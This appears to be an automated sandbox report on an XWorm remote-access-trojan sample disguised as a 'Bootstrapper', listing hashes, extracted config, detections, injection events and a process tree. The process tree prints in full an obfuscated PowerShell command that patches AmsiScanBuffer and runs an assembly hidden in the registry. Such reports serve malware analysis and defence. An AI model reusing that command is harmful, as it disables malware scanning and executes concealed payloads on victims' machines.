xworm | 81495b2fed47dda40e5ca4e871ad989d5906b2d75fd563f2e2134f10264f2d55

Analysis

max time kernel
20s
max time network
16s
platform
windows11-21h2_x64
resource
win11-20250218-en
resource tags

arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
submitted
04/03/2025, 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV3_1_protected.exe
Size

7.3MB
MD5

2a8cf24db62f39d25634b4d3d1f7d997
SHA1

3a5161efaec9020bb223b3ce75d80af0016658e1
SHA256

81495b2fed47dda40e5ca4e871ad989d5906b2d75fd563f2e2134f10264f2d55
SHA512

eeeca9595a1bfa6a03859080eff4d11d41de686ff3b6171b674a650112c74534b99400cc68461d1dc99a03c57c1f7566c39e9ea4a79d851a95964c1d1ab691da
SSDEEP

196608:PS4H3QWhpkTBch+3Tq02WBqUx6H783EPq2s1j:PSPyk9mSqPWcUx478n5p

Score

10^/10

xworm defense_evasion discovery execution rat themida trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%LocalAppData%
install_file
$77VoicemodDriver.exe
pastebin_url
https://pastebin.com/raw/tPMsFy8n

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001900000002aed7-13.dat	family_xworm
behavioral1/memory/2816-21-0x0000000000DC0000-0x0000000000DF4000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3760 created 2816	3760	svchost.exe	90

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BootstrapperV3_1_protected.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BootstrapperV3_1_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BootstrapperV3_1_protected.exe

Executes dropped EXE 3 IoCs

pid	Process
2816	$77ByfronBypass.exe
400	$77SolaraInstaller2.1.exe
3376	$77BootstrapperFixer.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2984-6-0x0000000000400000-0x00000000011F6000-memory.dmp	themida
behavioral1/memory/2984-7-0x0000000000400000-0x00000000011F6000-memory.dmp	themida
behavioral1/memory/2984-44-0x0000000000400000-0x00000000011F6000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BootstrapperV3_1_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.EXE

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2984	BootstrapperV3_1_protected.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperV3_1_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77BootstrapperFixer.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2984	BootstrapperV3_1_protected.exe
2984	BootstrapperV3_1_protected.exe
2680	powershell.EXE
2680	powershell.EXE
2680	powershell.EXE
2680	powershell.EXE
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
2156	wmiprvse.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
4728	WerFault.exe
4728	WerFault.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
3760	svchost.exe
3760	svchost.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe
640	winlogon.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3260	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	$77ByfronBypass.exe
Token: SeDebugPrivilege	2680	powershell.EXE
Token: SeDebugPrivilege	2680	powershell.EXE
Token: SeDebugPrivilege	640	winlogon.exe
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeShutdownPrivilege	3260	Explorer.EXE
Token: SeCreatePagefilePrivilege	3260	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2816	2984	BootstrapperV3_1_protected.exe	90
PID 2984 wrote to memory of 2816	2984	BootstrapperV3_1_protected.exe	90
PID 2984 wrote to memory of 400	2984	BootstrapperV3_1_protected.exe	91
PID 2984 wrote to memory of 400	2984	BootstrapperV3_1_protected.exe	91
PID 2984 wrote to memory of 3376	2984	BootstrapperV3_1_protected.exe	92
PID 2984 wrote to memory of 3376	2984	BootstrapperV3_1_protected.exe	92
PID 2984 wrote to memory of 3376	2984	BootstrapperV3_1_protected.exe	92
PID 2680 wrote to memory of 640	2680	powershell.EXE	5
PID 640 wrote to memory of 700	640	winlogon.exe	7
PID 640 wrote to memory of 984	640	winlogon.exe	12
PID 640 wrote to memory of 392	640	winlogon.exe	13
PID 640 wrote to memory of 648	640	winlogon.exe	14
PID 640 wrote to memory of 1028	640	winlogon.exe	15
PID 640 wrote to memory of 1140	640	winlogon.exe	17
PID 640 wrote to memory of 1164	640	winlogon.exe	18
PID 640 wrote to memory of 1180	640	winlogon.exe	19
PID 640 wrote to memory of 1188	640	winlogon.exe	20
PID 640 wrote to memory of 1196	640	winlogon.exe	21
PID 640 wrote to memory of 1292	640	winlogon.exe	22
PID 640 wrote to memory of 1328	640	winlogon.exe	23
PID 640 wrote to memory of 1352	640	winlogon.exe	24
PID 640 wrote to memory of 1564	640	winlogon.exe	25
PID 640 wrote to memory of 1616	640	winlogon.exe	26
PID 640 wrote to memory of 1636	640	winlogon.exe	27
PID 640 wrote to memory of 1684	640	winlogon.exe	28
PID 640 wrote to memory of 1724	640	winlogon.exe	29
PID 640 wrote to memory of 1772	640	winlogon.exe	30
PID 640 wrote to memory of 1840	640	winlogon.exe	31
PID 640 wrote to memory of 1880	640	winlogon.exe	32
PID 640 wrote to memory of 1916	640	winlogon.exe	33
PID 640 wrote to memory of 1928	640	winlogon.exe	34
PID 640 wrote to memory of 2036	640	winlogon.exe	35
PID 640 wrote to memory of 2044	640	winlogon.exe	36
PID 640 wrote to memory of 2148	640	winlogon.exe	37
PID 640 wrote to memory of 2312	640	winlogon.exe	39
PID 640 wrote to memory of 2404	640	winlogon.exe	40
PID 640 wrote to memory of 2544	640	winlogon.exe	41
PID 640 wrote to memory of 2552	640	winlogon.exe	42
PID 640 wrote to memory of 2584	640	winlogon.exe	43
PID 640 wrote to memory of 2620	640	winlogon.exe	44
PID 640 wrote to memory of 2664	640	winlogon.exe	45
PID 640 wrote to memory of 2684	640	winlogon.exe	46
PID 640 wrote to memory of 2692	640	winlogon.exe	47
PID 640 wrote to memory of 2700	640	winlogon.exe	48
PID 640 wrote to memory of 2912	640	winlogon.exe	49
PID 640 wrote to memory of 2996	640	winlogon.exe	50
PID 640 wrote to memory of 3076	640	winlogon.exe	52
PID 640 wrote to memory of 3260	640	winlogon.exe	53
PID 640 wrote to memory of 3404	640	winlogon.exe	54
PID 640 wrote to memory of 3448	640	winlogon.exe	55
PID 640 wrote to memory of 3840	640	winlogon.exe	58
PID 640 wrote to memory of 3920	640	winlogon.exe	59
PID 640 wrote to memory of 3992	640	winlogon.exe	60
PID 640 wrote to memory of 4040	640	winlogon.exe	61
PID 640 wrote to memory of 4292	640	winlogon.exe	62
PID 640 wrote to memory of 4424	640	winlogon.exe	63
PID 640 wrote to memory of 2864	640	winlogon.exe	66
PID 640 wrote to memory of 3320	640	winlogon.exe	67
PID 640 wrote to memory of 1956	640	winlogon.exe	69
PID 640 wrote to memory of 2728	640	winlogon.exe	70
PID 640 wrote to memory of 1448	640	winlogon.exe	71
PID 640 wrote to memory of 1992	640	winlogon.exe	72
PID 640 wrote to memory of 3472	640	winlogon.exe	73
PID 640 wrote to memory of 424	640	winlogon.exe	74

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:392

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QheaZIOAGYTt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cIgCiidRretYtf,[Parameter(Position=1)][Type]$rzZDMaDRMm)$VPnUPOMDfRs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+'ory'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$VPnUPOMDfRs.DefineConstructor(''+'R'+'T'+'S'+'pe'+'c'+''+'i'+'a'+'l'+''+'N'+'a'+'m'+''+'e'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+'g'+''+','+'P'+[Char](117)+'bl'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$cIgCiidRretYtf).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'im'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$VPnUPOMDfRs.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'ig'+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$rzZDMaDRMm,$cIgCiidRretYtf).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $VPnUPOMDfRs.CreateType();}$UEJrAItJFJgrT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+'e'+'m.'+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+'.U'+'n'+'sa'+'f'+''+'e'+''+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+'e'+'M'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$sifakYiftBrDzt=$UEJrAItJFJgrT.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uGcVXjXTOIroSmMwJjx=QheaZIOAGYTt @([String])([IntPtr]);$RCfhNMgAJIaejHbKDNMgzU=QheaZIOAGYTt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lruwyjaEDMi=$UEJrAItJFJgrT.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+'n'+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ItWLMlsHklPgRQ=$sifakYiftBrDzt.Invoke($Null,@([Object]$lruwyjaEDMi,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+'yA')));$vlrrWuzmEemZhILGg=$sifakYiftBrDzt.Invoke($Null,@([Object]$lruwyjaEDMi,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$nrZBTop=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ItWLMlsHklPgRQ,$uGcVXjXTOIroSmMwJjx).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$DcjAJQbxqVWwniFEK=$sifakYiftBrDzt.Invoke($Null,@([Object]$nrZBTop,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$BnmvbsLbrV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vlrrWuzmEemZhILGg,$RCfhNMgAJIaejHbKDNMgzU).Invoke($DcjAJQbxqVWwniFEK,[uint32]8,4,[ref]$BnmvbsLbrV);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](148-11),[Byte](81+120),[Byte](232-48),[Byte](41+46),[Byte](111-111),[Byte](53-46),[Byte](43+85),[Byte](138-7),[Byte](213-21),[Byte](7-7),[Byte](121+74),[Byte](222-91),[Byte](68+125),[Byte](140-140)),0,$DcjAJQbxqVWwniFEK,35-21);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vlrrWuzmEemZhILGg,$RCfhNMgAJIaejHbKDNMgzU).Invoke($DcjAJQbxqVWwniFEK,[uint32]8,0x20,[ref]$BnmvbsLbrV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+'7'+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1352
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\System32\svchost.exe
